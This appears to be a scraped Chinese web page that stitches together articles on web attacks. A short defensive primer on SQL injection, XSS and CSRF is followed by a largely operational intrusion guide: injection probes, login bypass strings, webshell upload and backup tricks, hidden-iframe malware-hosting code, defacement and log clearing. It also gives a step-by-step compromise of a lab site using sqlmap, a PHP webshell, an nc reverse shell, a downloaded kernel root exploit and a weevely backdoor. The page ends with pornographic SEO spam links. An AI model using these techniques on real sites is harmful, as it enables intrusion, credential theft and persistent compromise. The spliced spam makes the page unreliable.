整合營銷服務商

          電腦端+手機端+微信端=數據同步管理

          免費咨詢熱線:

          計算機網絡:常見的網絡攻擊方式!黑客慣用的伎倆

          計算機網絡:常見的網絡攻擊方式!黑客慣用的伎倆

          客與安全

          在當今的互聯網當中,總是存在著我們看不見也摸不著的一些 “互聯網地下工作者”,也就是黑客。黑客的攻擊方式分為很多種,有非破壞性攻擊和破壞性攻擊。非破壞性攻擊一般是為了擾亂系統的執行,使之暫時失去正常正常對外界提供服務的能力,比如臭名昭著的DDoS攻擊等。而破壞性攻擊主要會造成兩種結果:系統數據受損或者信息被竊取,好比如CSRF攻擊等。黑客使用的攻擊大致可分為三種,植入病毒式、洪水式(大幅度攻擊)、系統漏洞式。

          ?他們攻擊的特點主要集中于:分布式、高流量、深度匿名。就好比如DDoS攻擊,利用的就是國外大量的“肉雞”計算機的信息沒有登記,所以黑客再利用“肉雞”進行互聯網攻擊,是很難去追尋攻擊的地址,無法有效地抵御他們的攻擊。雖然說現在云端服務器商開始崛起,能夠提供一套完整的安全解決方案,如騰訊云、阿里云等等,都能夠提供高防服務器來抵御市面上大多數的DDoS攻擊,但是成本略高,對于大多數小中型企業是有點難以承受。

          ?即使這樣,互聯網企業要想建立一套完整的信息安全體系,都需要遵守CIA原則,分別為保密性(Confidentiality)、完整性(Integrity)、可用性(Availability)。

          保密性:對與一些涉及用戶隱私、有價值的數據進行保密操作,無論是信息存儲還是傳輸過程,都要保證好用戶數據及相關資源的安全。值得一提的是,數據加密有些時候不只是防外部的黑客,還需要避免數據管理員在某些利益的驅動下,對數據庫里的信息篡改或者泄露,進一步導致黑客利用這些數據進行網站襲擊,造成企業的巨大損失。

          完整性:用戶訪問的數據是要完整的,而不是缺失的或是篡改的,不然會導致用戶訪問到的數據是不正確的。在實際編碼中,我們為了保證數據的完整性,通常使用的方法是對數據進行簽名校驗、加密加鹽值等等(比如MD5/SHA和數據簽名等)

          可用性:服務是能夠保證可用的,如果連服務都不能正常使用,保證數據安全更是天方夜譚。而有可能導致服務不可用的一大因素是高并發,針對于這種情況,我們通常使用都是對進入的請求加以約束,如網頁操作時間限制、請求限流、數據清洗等方式。

          SQL注入

          ?SQL注入是注入式攻擊中算是比較常見的了,不過隨著開發人員的安全意識普遍提高,開始重視這些問題,再加上MyBatis等框架大幅度推廣,SQL注入攻擊比以前要少了很多。SQL注入攻擊的原理是程序方面未將代碼與數據進行嚴格的隔離,導致在請求數據的時候,將數據嵌套到代碼中的一部分去執行,從而導致一些意想不到的問題。舉個例子,當對用戶數據進行修改操作時,直接將未轉義的數據當成變量進行操作,代碼演示:

          updatet_usersetnick_name="\"# -- !#(@ " where user_id=123;

          OR

          select*fromt_userwhere(user_name='1'OR'1'='1')and(password='1'OR'1'='1');

          ?第一種sql語句,會導致t_user表中nick_name全部被修改;第二種情況,會無視賬號密碼的情況,直接得到用戶信息;還有很多種SQL注入的情況,在這里就不一一贅述了。下面講講怎么去抵御這種攻擊:

          過濾出用戶在網頁輸入數據時摻雜的特殊字符,進而避免出現轉義數據的風險。

          業務編碼時,避免使用字符串拼接的SQL語句,最好采用參數綁定傳入的SQL參數。

          合理使用數據庫訪問框架提供的防注入機制。如MyBatis提供的#{}動態參數,從而有效地防止SQL注入。同時也要注意${}的使用,${}相當于占位符,等同于使用字符串拼接SQL。

          XSS

          ?XSS攻擊,又稱跨站腳本攻擊,英譯為Cross-Site Scripting,這是為了避免跟前端語言CSS的簡稱沖突,所以另命名為XSS。XSS是指黑客提供某些技術手段,向正常用戶請求的網頁植入惡意腳本,從而在此基礎上執行任意腳本,主要用于信息竊取、破壞等目的。XSS主要分為反射型XSS、存儲型XSS和DOM型XSS。

          ?在防范XSS攻擊上,主要還是通過在用戶輸入數據做過濾或轉義方面下功夫。后端:可以使用Jsoup框架對輸入的字符串進行XSS過濾或者使用Spring框架提供的HtmlUtils工具類對字符串進行HTML轉義。前端:盡可能使用innerText而不是innerHTML。

          CSRF

          ?CSRF攻擊,又稱跨站請求偽造,全稱為 Cross-Site Request Forgery,也全稱為 One-click Attack,即在用戶毫不知情的情況下,假冒用戶來模擬操作,對已經成功登錄的網頁上惡意操作,如發表惡意帖子、修改個人信息、群發信息甚至修改密碼等等。

          ?雖然從攻擊層面上看,兩者有很多相似之處,但是CSRF還是有別于XSS的。從技術層面上看,XSS是指黑客在用戶請求的網頁植入了自己的惡意腳本;而CSRF是指假冒已經成功登錄的用戶進行 “為所欲為” 的操作。

          XSS的關注點是在于用戶數據沒有進行過濾或轉義

          CSRF的關注點是在于HTTP接口沒有防范不受信任的調用。

          防范CSRF攻擊主要有以下兩種方式:

          (1)CSRF Token驗證,利用瀏覽器的同源策略(不同源的客戶端腳本無法在沒有授權的情況下,直接讀取對方資源),在HTTP接口執行前驗證頁面或者Cookie中設置的Token,只有驗證通過才繼續執行請求。

          (2)人機接口,常見的就是在用戶在進行相關重要操作(如修改密碼)校驗短信驗證碼

          寫在最后:對于準備成為一名優秀程序員的朋友,如果你想更好地提升你的編程核心能力(內功),讓自己成為一個具有真材實料的厲害的程序員,不妨從現在開始!C/C++,永不過時的編程語言~

          編程學習書籍分享:

          編程學習視頻分享:

          整理分享(多年學習的源碼、項目實戰視頻、項目筆記,基礎入門教程)

          歡迎轉行和學習編程的伙伴,利用更多的資料學習成長比自己琢磨更快哦!

          對于C/C++感興趣可以關注小編在后臺私信我:【編程交流】一起來學習哦!可以領取一些C/C++的項目學習視頻資料哦!已經設置好了關鍵詞自動回復,自動領取就好了!

          “黑客”實戰篇之“網站入侵的攻與防詳解”

          之前在黑客技術文章中講了很多黑客技術原理,近期我將通過文章講述一些黑客實戰內容,想了解黑客實戰技術的朋友可以多關注我的文章。

          今天就以本篇文章內容給大家講述一下黑客"入侵網站的"基本流程以及技術實現過程!

          一、 先摸清網站的基本架構(知己知彼學習)

          常見的幾種基本架構如下:

          1、單機模式

          應用程序、數據庫、文件等所有資源都集中在一臺 Server上,典型案例:基于 LAMP 架構的 PHP 網站;

          單機時代(純依賴RDBMS)

          優點:簡單、快速迭代達成業務目標;缺點:存在單點、談不上高可用;技術點:應用設計要保證可擴展;

          2、單機+緩存模式

          有一定的業務量和用戶規模了,想提升網站速度,于是,緩存出場了。

          單機時代+緩存出場

          優點:簡單有效、方便維護;缺點:存在單點、談不上高可用;技術點:客戶端(瀏覽器)緩存、前端頁面緩存、頁面片段緩存、本地數據緩存/數據庫緩存、遠程緩存;

          3、數據服務與應用分離模式

          用戶量每天在增長,數據庫瘋狂讀寫,逐漸發現一臺服務器快撐不住了。于是,決定把數據服務和APP做分離。

          數據服務與應用分離

          優點:簡單有效、方便維護、提高不同Server對硬件資源的利用率;缺點:存在單點、談不上高可用;技術點:文件服務器部署、數據庫服務器,擴展數據訪問模塊;

          分離后三臺 Server 對硬件資源的需求各不相同:

          4、數據庫讀寫分離模式

          單臺數據庫也感覺快撐不住了,一般都會嘗試做"讀寫分離"。由于大部分互聯網"讀多寫少"的特性所決定的。Salve的臺數,取決于按業務評估的讀寫比例。

          數據庫讀寫分離

          優點:簡單有效、降低數據庫單臺壓力;缺點:讀寫分離,增加程序難度,架構變復雜,維護難度增加;技術點:數據庫主從同步部署,擴展數據訪問模塊,實現讀寫分離;

          5、應用服務集群模式

          數據庫層面是緩解了,但是應用程序層面也出現了瓶頸,由于訪問量增大,加上早期程序員水平有限寫的代碼也很爛,人員流動性也大,很難去維護和優化。所以,很常用的辦法還是"堆機器"。

          應用出現瓶頸 負載均衡集群

          優點:增加服務器和HA機制,系統性能及可用性得到保證;缺點:應用之間緩存、Session一致性問題;技術點:負載均衡;

          通過集群解決高并發、海量數據問題的常用手段,實現系統的可伸縮性。通過負載均衡調度器,可將用戶訪問分發到集群中的某臺 Server 上,應用服務器的負載壓力不再成為整個網站的瓶頸。

          6、集中式緩存、Session集中存儲

          加機器誰都會加,關鍵是加完之后得有效果,加完之后可能會引發一些問題。例如非常常見的:集群應用之間頁面輸出緩存和本地緩存一致性的問題,Session保存的問題......。

          集中式緩存 Session集中存儲

          優點:應用之間緩存、Session一致,存儲無限制,可以擴展;缺點:不如本地緩存訪問快,緩存服務器、Session服務器等仍存在單點問題;技術點:緩存服務器部署、Session集中存儲方案;

          7、動靜分離

          動靜分離也是提高網站響應速度的一種常用方式。將動態請求與靜態請求分離開,盡量減少對應用服務器的壓力。同時,可以再進一步對靜態請求,進行緩存,以加快響應速度。可以需要開發人員配合(把靜態資源放獨立站點下),也可以不需要開發人員配合(利用7層反向代理來處理,根據后綴名等信息來判斷資源類型)。

          使用動靜分離

          優點:減輕應用負載壓力,針對靜態文件緩存;缺點:靜態文件緩存更新失效問題;技術點:動靜分離、靜態文件緩存方案;

          8、反向代理和CDN加速網站響應

          使用反向代理和CDN加速網站響應:CDN 和反向代理的基本原理都是緩存,區別在于:

          1. CDN部署在網絡提供商的機房;

          2. 反向代理則部署在網站的中心機房;

          使用 CDN 和反向代理的目的都是盡早返回數據給用戶,一方面加快用戶訪問速度,另一方面也減輕后端服務器的負載壓力。

          使用反向代理和 CDN 加速網站響應

          優點:減輕應用負載壓力,異地緩存有效解決不同地方用戶訪問過慢的問題;缺點:成本大幅增加,架構進一步復雜化,也維護難度進一步增大,靜態文件緩存更新失效問題;技術點:CDN、反向代理方案;

          9、使用NoSQL和搜索引擎

          到這里,已經基本做到了DB層面和應用層面的橫向擴展了,可以開始關注一些其它方面,例如:站內搜索的精準度,對DB的依賴,開始引入全文索引、NoSQL。

          NoSQL和搜索引擎都是源自互聯網的技術手段,對可伸縮的分布式特性具有更好的支持。應用服務器則通過一個統一數據訪問模塊訪問各種數據,減輕應用程序管理諸多數據源的麻煩。

          使用NoSQL和搜索引擎

          優點:降低DB依賴;缺點:單點問題,談不上高可用;技術點:NoSQL、搜索引擎、分布式;

          、 網站的入侵基本流程

          1、信息收集

          1) Whois信息--注冊人、電話、郵箱、DNS、地址

          2) Googlehack--敏感目錄、敏感文件、后臺地址

          3) 服務器IP--Nmap掃描、端口對應的服務、C段

          4) 旁注--Bing查詢、腳本工具

          5) 如果遇到CDN--Cloudflare(繞過)、從子域入手(mail,postfix)、DNS傳送域漏洞

          6) 服務器、組件(指紋)--操作系統、web server(apache,nginx,iis)、腳本語言,數據庫類型

          2、漏洞挖掘

          1) 探測Web應用指紋--如博客類:Wordpress、Emlog、Typecho、Z-blog,社區類:Discuz、PHPwind、Dedecms,StartBBS、Mybb等等,PHP腳本類型:Dedecms、Discuz!、PHPCMS、PHPwind

          2) XSS、CSRF、SQLinjection、權限繞過、任意文件讀取、文件包含...

          3) 上傳漏洞--截斷、修改、解析漏洞

          4) 有無驗證碼--進行暴力破解

          3、漏洞利用

          1) 思考目的性--達到什么樣的效果

          2) 隱藏,破壞性--根據探測到的應用指紋尋找對應的exp攻擊載荷或者自己編寫

          3) 開始漏洞攻擊,獲取相應權限,根據場景不同變化思路拿到webshell

          4、權限提升

          1) 根據服務器類型選擇不同的攻擊載荷進行權限提升

          2) 無法進行權限提升,結合獲取的資料開始密碼猜解,回溯信息收集

          5、植入后門

          1) 隱蔽性

          2) 定期查看并更新,保持周期性

          6、日志清理

          1) 偽裝,隱蔽,避免激警他們通常選擇刪除指定日志

          2) 根據時間段,find相應日志文件 太多太多。

          三、 黑客入侵網站的常規思路方法

          1、經典注入

          通常,判斷一個網站是否存在注入點,可以用',and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,來判斷,如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那么就存在注入點

          2、萬能密碼OR漏洞

          萬能密碼'or'='or',可以用在后臺管理輸入,有的網站由于沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞存在于ASP類型的網站

          3、爆庫

          爆庫,可以理解為爆出數據庫下載,用爆庫之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進制的\符號,而數據庫大于5.0就可以進行爆庫,如在PHP手工高級注入時,用VERSION()這個變量猜出網站數據庫版本,如果一個網站數據庫大于5.0,且是ACESS數據庫,那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因為%5C是爆二級目錄,所以應該是這樣,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非法下載數據庫,而把數據庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我們把%23加到替換#,http://www.xx.com/rpd/%23database.mdb

          4、COOKIE中轉,SQL防注入程序,提醒你IP已被記錄

          COOKIE中轉,SQL防注入,如果檢測一個網站時,彈出這樣一個對話框,上面出現SQL防注入程序提醒的字語,那么我們可以利用COOKIE中轉,注入中轉來突破,方法是先搭建一個ASP環境(且網站為ASP網站),然后打開中轉工具,記住一個網站的頁面地址粘貼進工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來,打開網頁,輸入http://127.0.0.1:(端口)/目錄里文件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了

          5、手工

          ASP手工語句表名 and exists (select * from 表名)

          列名 and (select count(列名) from 表名)>0

          長度 and (select top 1 len(username) from admin)>0

          內容 and (select top 1 asc(mid(username,1,1)) from admin)>100

          PHP手工語句:order by(猜字段),and 1=2 union select (字段數)and 1=2 union selsect from(位置)

          幾個常用變量 ,USER(),VERSION()<數據庫版本),database()<數據庫名稱>

          6、抓包拿WEBSHELL

          如果進入后臺發現,點數據庫備份的時候發現找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具WOSCK抓包,一張圖片,一個ASP馬,自行搭建一個上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )

          7、數據庫備份拿WEBSHELL和一句話木馬入侵

          通常進入后臺了,發現有數據庫備份,拿WEBSHELL吧,找一個添加產品的地方,傳一個大馬,格式為JPG圖片,然后把圖片地址粘貼到數據庫備份那里,給起個名字,如SHELL.ASP,然后合地址訪問的時候就進入webshell了,一句話木馬入侵,先編輯記事本,加入一句話,改為2.jpg,然后備份,訪問,發現500內部服務器錯誤,證明一句話成功,接下來用一句話木馬客戶端連接,得到路徑頁面,然后改下馬名,輸入大馬內容,提交,得到WEBSHELL

          8、DB權限差異備份拿WEBSHELL

          如果一個網站注入點是MYSQL數據庫,且是DB權限,或者是SA權限,能夠列目錄,那么就好辦了,找到網站的目錄,目錄通常在D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功后,再輸入大馬內容,拿到WEBSHELL

          9、找后臺

          找后臺,一般默認為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,當然,這只是默認,一些大網站不可能還用admin作為后臺,有的隱藏很深,可以簡單用site:網站 inurl:后臺來猜,或者下載源HTML文件分析找出后臺,或者用各種工具來掃描了,方法很多的

          10、腳本提示

          有的網站要求進入后臺會出現一個腳本提示,就像VB編程里INPUTBOX "",一個對話輸入框,我們輸入administrator突破,admin代表以管理員身份來進入

          11、php后門和EWEBEDITOR編輯器入侵

          PHP后門,如之前爆出的DISZ漏洞,在一個PHP網站后面加C.PHP,如果出現1,那么傳個PHP馬就拿到WEBSHELL,EWEBEDITOR編輯器入侵,是很快速的方式,設置好上傳文件類型,傳ASA,或者其他的格式,然后訪問拿到WEBSHELL,如沒有直接加語句拿到WEBSHELL

          12、上傳漏洞

          有的網站雖然沒有注入點,但存在一個上傳漏洞,那么我們如何來利用了,首先,打開上傳地址看是否存在,如果有,試想傳一個ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來上傳,動網,動力,動感,喬客4種方式,頁面地址格式要對應,如果一個網站地址彈出對話框,顯示上傳成功,那么證明可以拿到WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那么可以構建兩個上傳,第一個傳JPG的圖片,第二個傳ASP馬(大馬),記住,大馬后面要有個空格才行,如果一個網站地址出現文件類型不正確,請重新上傳,那么證明%90可以拿到WEBSHELL,只是格式不對,不允許,改后綴,只要是網站沒有過濾的格式,如果一個網站地址顯示請登陸再上傳,那么證明沒有拿到COOKIS,思路是在該網站注冊一個用戶,得到COOKIS,然后上傳就成功了

          13、簡單提權拿下服務器和SERV提權和pcanywhere三方提權

          簡單拿下服務器,也就是拿下網站IP主機,首先我們需要一個WEBSHELL,然后看看組件信息,看看路徑可讀可以寫不,如果有一個可以,那么來到CMD命令下,首先輸入可寫的文件內容,執行命令加一個帳號和最高管理權限,然后輸入netstat -an,得到主機連接端口,然后用3389連接進入,讓其成為肉雞(最好),這樣比較隱蔽我們操作

          14、反查入侵和旁注和社會工程學

          反查IP入侵,也就是入侵21,端口,首先我們入侵網站先PING WWW.XXX.COM ,出IP,然后到反查IP站點查掛了多少個域名,接下來,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探測密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會工程學X-WAY,來得到FTP密碼,也需要收集,并不是每個都行,總之是自己的經驗

          15、跨站腳本攻擊

          跨站(CSS),被動攻擊,現在需要更多的思路和經驗了

          三段經典跨站代碼

          <script>alert("跨站開始")</script>

          <script>alert("document.cookie")</script>

          <script>window.open(http://www.hackgirl.net)</script>

          16、特殊空格

          利用TAB制作的特殊空格,然后注冊時輸入空格,加管理名字,隨便在網站上找個斑竹,或者管理的名字,這樣來注冊,有時自己注冊的這個也會變成管理員

          17、改主頁

          改主頁,拿到WEBSHELL后,先找出首頁文件,一般為index.asp,index.php.index.jsp,index.html,然后來到站點根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁代碼(黑頁),保存,再訪問時已經變成自己想要的結果了

          18、掛馬

          首先在WEBSHELL里,建立一個文本,改為1.htm,接下來在主頁最下面掛

          兩段經典掛馬代碼

          <html>

          <iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>

          </html>

          <SCRIPT language=javascript>

          window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");

          </script>

          四、 網站入侵全過程實例

          假設入侵的網站域名是hack-test.com

          第一步:用ping命令獲取網站服務器的IP地址

          現在我們獲取了網站服務器的IP地址為:173.236.138.113

          第二步:尋找同一服務器上的其它網站,我們使用sameip.org.

          26 sites hosted on IP Address 173.236.138.113

          173.236.138.113上有26個網站,很多黑客為了攻破你的網站可能會檢查同服務器上的其它網站,但是本次是以研究為目標,我們將拋開服務器上的其它網站,只針對本次測試的網站來進行入侵檢測。

          第三步:查詢關于網站的以下信息:

          1. DNS records (A, NS, TXT, MX and SOA)

          2. Web Server Type (Apache, IIS, Tomcat)

          3. Registrar (the company that owns your domain)

          4. Your name, address, email and phone

          5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

          6. Your server OS (Unix,Linux,Windows,Solaris)

          7. Your server open ports to internet (80, 443, 21, etc.)

          讓我們開始找網站的DNS記錄,我們用who.is來完成這一目標.

          發現DNS記錄如下:

          確定web服務器的類型:

          發現Web服務器是apache,接下來確定它的版本.

          IP: 173.236.138.113

          Website Status: active

          Server Type: Apache

          Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

          Page Views per Visit: 1 Month: 2.0 3Month: 3.7

          接下來尋找網站域名的注冊信息,你的電話、郵箱、地址等

          現在已經獲取了你的網站域名的注冊信息,包括你的重要信息等.

          接下來可以通過backtrack5中的whatweb來獲取網站服務器操作系統類型和服務器的版本:

          發現網站使用了著名的php整站程序wordpress,服務器的的系統類型為FedoraLinux,Web服務器版本Apache 2.2.15。

          繼續查看網站服務器開放的端口,用滲透測試工具nmap:

          1、Find services that run on server(查看服務器上運行的服務)

          2、Find server OS(查看操作系統版本)

          只有80端口是開放的,操作系統是Linux2.6.22(Fedora Core 6),現在已經收集了所有關于網站的重要信息,接下來開始掃描尋找漏洞,比如:

          Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等

          3、用Nikto來收集漏洞信息:

          root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

          4、用到Backtrack 5 R1中的W3AF 工具:

          root@bt:/pentest/web/w3af#./w3af_gui

          輸入要檢測的網站地址,選擇完整的安全審計選項

          稍等一會,將會看到掃描結果

          發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.

          http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

          第四步:通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.

          Using sqlmap with –u url

          輸入N按回車鍵繼續

          發現你的網站存在mysql顯錯注入,mysql數據庫版本是5.0. 我們通過加入參數"-dbs"來嘗試采集數據庫名

          發現三個數據庫,接下來通過參數"-D wordpress -tables"來查看wordpress數據庫的所有表名

          通過參數"-T wp_users –columns "來查看wp_users表中的字段.

          接下來猜解字段user_login和user_pass的值.用參數"-C user_login,user_pass–dump"

          會發現用戶名和密碼hashes值

          第五步:通過以下在線破解網站來破解密碼hashes

          http://www.onlinehashcrack.com/free-hash-reverse.php

          第六步:登陸wordpress的后臺wp-admin

          嘗試上傳php webshell到服務器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然后訪問我們的phpwebshell.

          Phpwebshell被解析了,我們可以控制網站的文件,但是我們只希望獲得網站服務器的root權限,來入侵服務器上其它的網站。

          第六步:用NC來反彈一個shell

          首先在我們的電腦上監聽5555端口。

          然后在Php webshell上反向連接我們的電腦,輸入IP和端口5555.

          點擊連接我們會看到

          接下來我們嘗試執行一些命令:

          id

          uid=48(apache) gid=489(apache) groups=489(apache)

          (用來顯示用戶的id和組)

          pwd

          /var/www/html/Hackademic_RTB1/wp-content/plugins

          (顯示服務器上當前的路徑)

          uname -a

          Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

          (顯示內核版本信息)

          現在我們知道,服務器的內核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關漏洞.

          第七步:在服務器上測試了很多exp之后,用以下的exp來提升權限.

          http://www.exploit-db.com/exploits/15285

          在nc shell上執行以下命令:

          wgethttp://www.exploit-db.com/exploits/15285 -o roro.c

          (下載exp到服務器并重命名為roro.c)

          注:很多linux內核的exp都是C語言開發的,因此我們保存為.c擴展名.

          exp roro.c代碼如下:

          #include

          #define RECVPORT 5555

          #define SENDPORT 6666

          int prep_sock(int port)

          {

          int s, ret;

          struct sockaddr_in addr;

          s=socket(PF_RDS, SOCK_SEQPACKET, 0);

          if(s < 0)

          {

          printf("[*] Could not open socket.");

          exit(-1);

          }

          memset(&addr, 0, sizeof(addr));

          通過以上代碼我們發現該exp是C語言開發的,我們需要將他編譯成elf格式的,命令如下:

          gcc roro.c –ororo

          接下來執行編譯好的exp

          ./roro

          執行完成之后我們輸入id命令

          id

          發現我們已經是root權限了

          uid=0(root) gid=0(root)

          現在我們可以查看/etc/shadow文件

          cat/etc/shadow

          第八步:用weevely制作一個php小馬上傳到服務器上,留個后門

          1、weevely使用選項

          root@bt:/pentest/backdoors/web/weevely#./main.py

          2.用weevely創建一個密碼為koko的php后門

          root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

          接下來上傳到服務器之后來使用它

          root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

          測試我們的hax.php后門

          以上就是入侵網站的全過程實例描述!

          五、如何判斷網站被黑?如何應對網站被黑?如何防止網站被黑?

          1、如何判斷網站被黑?

          如果存在下列問題,則您的網站可能已經被黑客攻擊:

          1) 通過site命令查詢站點,顯示搜索引擎收錄了大量非本站應有的頁面。

          2) 從百度搜索結果中點擊站點的頁面,跳轉到了其他站點。

          3) 站點內容在搜索結果中被提示存在風險。

          4) 從搜索引擎帶來的流量短時間內異常暴增。

          一旦發現上述異常,建議您立即對網站進行排查。包括:

          1、分析系統和服務器日志,檢查自己站點的頁面數量、用戶訪問流量等是否有異常波動,是否存在異常訪問或操作日志;

          2、檢查網站文件是否有不正常的修改,尤其是首頁等重點頁面;

          3、網站頁面是否引用了未知站點的資源(圖片、JS等),是否被放置了異常鏈接;

          4、檢查網站是否有不正常增加的文件或目錄;

          5、檢查網站目錄中是否有非管理員打包的網站源碼、未知txt文件等。

          2、如何應對網站被黑?

          如果排查確認您的網站存在異常,此時您需要立即做出處理,包括:

          1) 立即停止網站服務,避免用戶繼續受影響,防止繼續影響其他站點(建議使用503返回碼)。

          2) 如果同一主機提供商同期內有多個站點被黑,您可以聯系主機提供商,敦促對方做出應對。

          3) 清理已發現的異常,排查出可能的被黑時間,和服務器上的文件修改時間相比對,處理掉黑客上傳、修改過的文件;檢查服務器中的用戶管理設置,確認是否存在異常的變化;更改服務器的用戶訪問密碼。

          注:可以從訪問日志中,確定可能的被黑時間。不過黑客可能也修改服務器的訪問日志。

          4) 做好安全工作,排查網站存在的漏洞,防止再次被黑。

          3、如何防止網站被黑?

          1) 為避免您的網站被黑客攻擊,您需要在平時做大量的工作,例如

          2) 定期檢查服務器日志,檢查是否有可疑的針對非前臺頁面的訪問。

          3) 經常檢查網站文件是否有不正常的修改或者增加。

          4) 關注操作系統,以及所使用程序的官方網站。如果有安全更新補丁出現,應立即部署,不使用官方已不再積極維護的版本,如果條件允許,建議直接更新至最新版;關注建站程序方發布的的安全設置準則。

          5) 系統漏洞可能出自第三方應用程序,如果網站使用了這些應用程序,建議仔細評估其安全性。

          6) 修改開源程序關鍵文件的默認文件名,黑客通常通過自動掃描某些特定文件是否存在的方式來判斷是否使用了某套程序。

          7) 修改默認管理員用戶名,提高管理后臺的密碼強度,使用字母、數字以及特殊符號多種組合的密碼,并嚴格控制不同級別用戶的訪問權限。

          8) 選擇有實力保障的主機服務提供商。

          9) 關閉不必要的服務,以及端口。

          10) 關閉或者限制不必要的上傳功能。

          11) 設置防火墻等安全措施。

          12) 若被黑問題反復出現,建議重新安裝服務器操作系統,并重新上傳備份的網站文件。

          客是如何入侵一個網站的?

          黑客入侵網站的步驟詳解:他們的行動藍圖

          在理論上,黑客對網站的入侵過程可概括為以下幾步:

          信息搜集:深入研究目標網站,盡可能搜集詳盡的信息。

          掃描與枚舉:確認開放的端口,運行的服務以及可能存在的安全漏洞。

          提權與攻擊:嘗試利用找到的漏洞進入網站后臺或數據庫。

          維持訪問權限:一旦成功入侵,黑客可能會尋求保持其訪問權限,以備后用。

          清除痕跡:刪除日志文件和其他痕跡,避免被發現。

          強調一點,上述所有行為,若未經網站所有者或管理員的明確許可,均屬非法。對于有志于網絡安全事業、希望提升技能并進行職業發展的人來說,合法的途徑包括成為網絡安全分析師、滲透測試員或道德黑客。正當的網絡安全實踐包括在合同范圍內執行滲透測試、網絡防御和安全漏洞評估,以幫助組織加強其網站和網絡的安全性。

          所需工具:黑客的得力助手

          黑客常使用各種工具來發現并利用網站的弱點,這些工具包括:

          掃描器:此類工具可掃描網站的端口,尋找開放的服務和潛在的安全漏洞。

          漏洞掃描工具:用于分析網站的安全漏洞,查找已知的安全弱點。

          Web代理工具:允許攔截和修改從瀏覽器發出的網絡請求。

          密碼破解工具:用于分析和破解網站登錄憑據的工具。

          自動化攻擊框架:如Metasploit等高級工具,提供一個平臺來管理和激活多種攻擊。

          必備語言:黑客的通行密鑰

          盡管黑客可能需要掌握多種編程語言,但以下幾種語言尤為關鍵:

          HTML/JavaScript:了解網站的構建基礎,能夠識別和利用客戶端的漏洞。

          SQL:用于與數據庫通信,黑客利用SQL注入攻擊直接操控網站的數據庫。

          Python/Perl/Ruby:這些腳本語言適用于快速開發攻擊工具或腳本。

          PHP/Java:熟悉這些服務器端語言有助于理解后臺處理和潛在的安全漏洞。

          還需掌握的能力:

          黑客不僅需要理論知識,還需具備以下能力:

          逆向工程和代碼審計:分析和理解不提供源代碼的應用程序。

          網絡分析:監控和解讀網絡流量,發現潛在的數據傳輸弱點。

          加密與解密:理解加密技術,有時還需能夠解密加密信息。

          社會工程學:利用人類心理,誘導他們泄露敏感信息或執行某些操作。

          此外,不斷提升自己的知識和技巧,遵循職業道德和法律規定,投身于防御工作,這些都是網絡安全專家成長之路的關鍵。通過增強對網絡安全挑戰的意識,我們可以共同構建一個更安全、更能抵御惡意攻擊者的數字環境。

          #數據庫誤操作# #黑客行為爭議# #分享編程心得# #相對url# #加密技術應用#

          #春日生活打卡季#


          主站蜘蛛池模板: 精品少妇ay一区二区三区 | 日本午夜精品一区二区三区电影| 成人区精品一区二区不卡| 日本免费一区二区在线观看| 中文字幕日韩一区二区不卡| 久久久久人妻精品一区蜜桃| 国产精品成人一区无码| 中文字幕视频一区| 中文人妻无码一区二区三区| jazzjazz国产精品一区二区| 成人一区专区在线观看| 国产成人久久一区二区不卡三区 | 大屁股熟女一区二区三区| 好吊妞视频一区二区| 糖心vlog精品一区二区三区| 日韩最新视频一区二区三| 精品不卡一区二区| 亚洲高清一区二区三区| 无码人妻精品一区二区三区99性| 久久无码人妻一区二区三区| 无码精品人妻一区二区三区人妻斩| 国产午夜精品一区二区三区嫩草| 久久精品国产一区二区电影| 国产在线观看一区二区三区精品| 国产激情一区二区三区 | 无码人妻久久一区二区三区蜜桃 | chinese国产一区二区| 久久亚洲色一区二区三区| 国产午夜三级一区二区三| 国产亚洲一区区二区在线 | 日韩久久精品一区二区三区 | 亚洲色一区二区三区四区| 亚洲AV无码一区二区三区网址| 亚洲一本一道一区二区三区| 久久精品无码一区二区三区不卡| 国产精品福利一区| 中文字幕一区二区日产乱码| 久久一区二区三区精品| 蜜桃AV抽搐高潮一区二区| 午夜精品一区二区三区在线观看| 人妻少妇一区二区三区|